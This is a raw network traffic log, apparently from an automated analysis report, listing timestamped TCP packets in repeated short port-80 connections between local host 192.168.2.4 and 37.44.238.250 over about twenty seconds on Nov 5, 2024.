                                                                                            Nov 5, 2024 23:54:23.017273903 CET805013037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:23.094762087 CET805013037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:23.094830036 CET5013080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:23.208934069 CET5013180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:23.208935976 CET5013080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:23.213881969 CET805013137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:23.213980913 CET5013180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:23.214060068 CET5013180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:23.214145899 CET805013037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:23.214297056 CET5013080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:23.218924046 CET805013137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:23.571095943 CET5013180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:23.576080084 CET805013137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:24.019639015 CET805013137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:24.090620995 CET805013137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:24.090667009 CET5013180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:24.223711014 CET5013180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:24.224173069 CET5013280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:24.229074001 CET805013137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:24.229087114 CET805013237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:24.229156971 CET5013180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:24.229183912 CET5013280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:24.229290962 CET5013280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:24.234164953 CET805013237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:24.586683989 CET5013280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:24.591694117 CET805013237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:25.043416023 CET805013237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:25.056494951 CET5013380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:25.057965994 CET5013280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:25.061404943 CET805013337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:25.061664104 CET5013380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:25.061744928 CET5013380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:25.063702106 CET805013237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:25.063807011 CET5013280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:25.066601038 CET805013337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:25.180840015 CET5013480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:25.185718060 CET805013437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:25.186048985 CET5013480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:25.186127901 CET5013480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:25.190993071 CET805013437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:25.417968035 CET5013380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:25.422863960 CET805013337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:25.422982931 CET805013337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:25.539814949 CET5013480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:25.544836044 CET805013437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:25.873442888 CET805013337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:25.948654890 CET805013337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:25.948717117 CET5013380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:26.006628036 CET805013437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:26.084197044 CET805013437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:26.084259987 CET5013480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:26.220968962 CET5013380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:26.221101999 CET5013480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:26.221709013 CET5013580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:26.226533890 CET805013537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:26.226600885 CET5013580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:26.226726055 CET5013580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:26.228310108 CET805013337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:26.228364944 CET5013380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:26.231533051 CET805013537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:26.231786013 CET805013437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:26.231828928 CET5013480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:26.571060896 CET5013580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:26.576076984 CET805013537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:27.042350054 CET805013537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:27.114298105 CET805013537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:27.114732027 CET5013580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:27.115547895 CET5013580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:27.121006012 CET805013537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:27.121114969 CET5013580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:27.243451118 CET5013680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:27.248425961 CET805013637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:27.248739004 CET5013680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:27.248897076 CET5013680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:27.253973007 CET805013637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:27.605964899 CET5013680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:27.610963106 CET805013637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:28.055320024 CET805013637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:28.130038023 CET805013637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:28.130098104 CET5013680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:28.263974905 CET5013680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:28.264785051 CET5013780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:28.270210028 CET805013637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:28.270255089 CET5013680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:28.270390987 CET805013737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:28.270448923 CET5013780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:28.270579100 CET5013780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:28.275715113 CET805013737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:28.617945910 CET5013780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:28.622824907 CET805013737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:29.085493088 CET805013737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:29.158462048 CET805013737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:29.160090923 CET5013780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:29.285897970 CET5013780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:29.286659956 CET5013880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:29.291234970 CET805013737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:29.291433096 CET5013780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:29.291460037 CET805013837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:29.291568995 CET5013880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:29.291663885 CET5013880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:29.296401978 CET805013837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:29.652070045 CET5013880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:29.656924009 CET805013837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:30.102713108 CET805013837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:30.164738894 CET5013880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:30.179821968 CET805013837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:30.309149981 CET5013880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:30.309933901 CET5013980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:30.314558029 CET805013837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:30.314605951 CET5013880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:30.315663099 CET805013937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:30.315725088 CET5013980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:30.315850019 CET5013980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:30.321146011 CET805013937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:30.664855003 CET5013980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:30.672665119 CET805013937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:30.962707996 CET5014080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:30.965967894 CET5013980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:30.967554092 CET805014037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:30.968358994 CET5014080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:30.968440056 CET5014080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:30.971390963 CET805013937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:30.971462965 CET5013980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:30.973731041 CET805014037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:31.085621119 CET5014180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:31.090780973 CET805014137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:31.091542959 CET5014180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:31.091594934 CET5014180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:31.097137928 CET805014137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:31.324032068 CET5014080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:31.328984022 CET805014037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:31.329205990 CET805014037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:31.446080923 CET5014180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:31.450963974 CET805014137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:31.789808035 CET805014037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:31.852247953 CET5014080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:31.863925934 CET805014037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:31.893173933 CET805014137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:31.961618900 CET5014080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:31.973112106 CET805014137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:31.973170996 CET5014180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:32.119046926 CET5014080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:32.119196892 CET5014180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:32.119791031 CET5014280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:32.126828909 CET805014237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:32.126847029 CET805014037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:32.126893997 CET5014280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:32.126920938 CET5014080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:32.127007961 CET5014280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:32.127337933 CET805014137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:32.127397060 CET5014180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:32.134087086 CET805014237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:32.477303028 CET5014280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:32.482233047 CET805014237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:32.930119991 CET805014237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:33.003645897 CET805014237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:33.006041050 CET5014280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:33.006186008 CET5014280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:33.011634111 CET805014237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:33.014081955 CET5014280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:33.131575108 CET5014380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:33.136507988 CET805014337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:33.138055086 CET5014380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:33.138135910 CET5014380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:33.143044949 CET805014337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:33.493968010 CET5014380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:33.498847961 CET805014337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:33.941673994 CET805014337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:34.020648003 CET805014337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:34.020706892 CET5014380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:34.155817032 CET5014380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:34.156594992 CET5014480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:34.276355982 CET805014337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:34.276407957 CET5014380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:34.277240038 CET805014337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:34.277290106 CET5014380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:34.277312040 CET805014437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:34.277321100 CET805014337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:34.277393103 CET5014380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:34.277400970 CET5014480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:34.277518034 CET5014480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:34.283466101 CET805014437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:34.633698940 CET5014480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:34.638660908 CET805014437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:35.082019091 CET805014437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:35.158123970 CET805014437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:35.158227921 CET5014480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:35.270792961 CET5014480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:35.271424055 CET5014580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:35.276046991 CET805014437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:35.276217937 CET805014537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:35.276242971 CET5014480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:35.276428938 CET5014580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:35.276504993 CET5014580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:35.281285048 CET805014537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:35.633548975 CET5014580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:35.638365984 CET805014537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:36.087872982 CET805014537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:36.160052061 CET5014580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:36.162278891 CET805014537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:36.263478994 CET5014580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:36.292864084 CET5014580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:36.293642998 CET5014680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:36.297952890 CET805014537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:36.297996044 CET5014580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:36.298401117 CET805014637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:36.298463106 CET5014680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:36.298546076 CET5014680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:36.303287983 CET805014637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:36.649178028 CET5014680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:36.654076099 CET805014637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:36.869220018 CET5014680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:36.869230986 CET5014780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:36.874149084 CET805014737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:36.878017902 CET5014780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:36.878124952 CET5014780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:36.883359909 CET805014737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:36.884299040 CET805014637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:36.884375095 CET5014680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:37.020560026 CET5014880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:37.025474072 CET805014837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:37.025969028 CET5014880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:37.026089907 CET5014880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:37.031263113 CET805014837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:37.229960918 CET5014780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:37.234920979 CET805014737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:37.234966993 CET805014737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:37.383560896 CET5014880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:37.388473034 CET805014837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:37.697130919 CET805014737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:37.771986961 CET805014737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:37.772037983 CET5014780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:37.837976933 CET805014837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:37.911415100 CET805014837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:37.911473036 CET5014880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:38.042496920 CET5014780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:38.042618990 CET5014880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:38.043395996 CET5014980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:38.047818899 CET805014737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:38.047871113 CET5014780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:38.048264980 CET805014937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:38.048322916 CET5014980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:38.048398018 CET5014980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:38.048719883 CET805014837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:38.048763990 CET5014880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:38.053165913 CET805014937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:38.399200916 CET5014980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:38.404059887 CET805014937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:38.860486984 CET805014937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:38.936009884 CET805014937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:38.938033104 CET5014980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:39.053953886 CET5014980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:39.054130077 CET5015080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:39.059238911 CET805015037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:39.059375048 CET5015080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:39.059478045 CET5015080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:39.059546947 CET805014937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:39.059717894 CET5014980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:39.064677000 CET805015037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:39.417610884 CET5015080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:39.422431946 CET805015037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:39.870655060 CET805015037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:39.939196110 CET805015037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:39.939250946 CET5015080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:40.055738926 CET5015080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:40.056386948 CET5015180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:40.061141968 CET805015037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:40.061167002 CET805015137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:40.061204910 CET5015080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:40.061242104 CET5015180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:40.061315060 CET5015180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:40.066839933 CET805015137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:40.414921045 CET5015180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:40.422081947 CET805015137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:40.882237911 CET805015137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:40.951447964 CET805015137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:40.951549053 CET5015180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:41.071547031 CET5015180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:41.071552038 CET5015280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:41.078222036 CET805015237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:41.078428030 CET5015280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:41.078499079 CET5015280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:41.078840017 CET805015137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:41.078933954 CET5015180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:41.083848000 CET805015237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:41.430407047 CET5015280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:41.435368061 CET805015237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:41.881203890 CET805015237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:41.958250999 CET805015237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:41.958307028 CET5015280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:42.090425014 CET5015280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:42.091284037 CET5015380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:42.095606089 CET805015237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:42.095654964 CET5015280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:42.096120119 CET805015337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:42.096177101 CET5015380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:42.096406937 CET5015380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:42.101149082 CET805015337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:42.446157932 CET5015380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:42.450984001 CET805015337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:42.775118113 CET5015480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:42.775300980 CET5015380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:42.897423029 CET5015580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:42.924674034 CET805015337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:42.924743891 CET5015380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:42.924773932 CET805015437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:42.924783945 CET805015537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:42.924927950 CET5015480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:42.924928904 CET5015580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:42.924984932 CET805015337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:42.925092936 CET5015580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:42.925092936 CET5015480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:42.925148010 CET5015380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:42.929987907 CET805015537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:42.930001974 CET805015437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:43.274169922 CET5015580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:43.274171114 CET5015480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:43.279042006 CET805015537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:43.279206991 CET805015437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:43.279216051 CET805015437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:43.736643076 CET805015537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:43.747227907 CET805015437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:43.808334112 CET805015537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:43.808397055 CET5015580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:43.825531960 CET5015480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:43.826075077 CET805015437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:43.939805984 CET5015480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:43.939915895 CET5015580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:43.940920115 CET5015680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:43.944927931 CET805015437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:43.944976091 CET5015480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:43.945333958 CET805015537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:43.945379972 CET5015580192.168.2.437.44.238.250
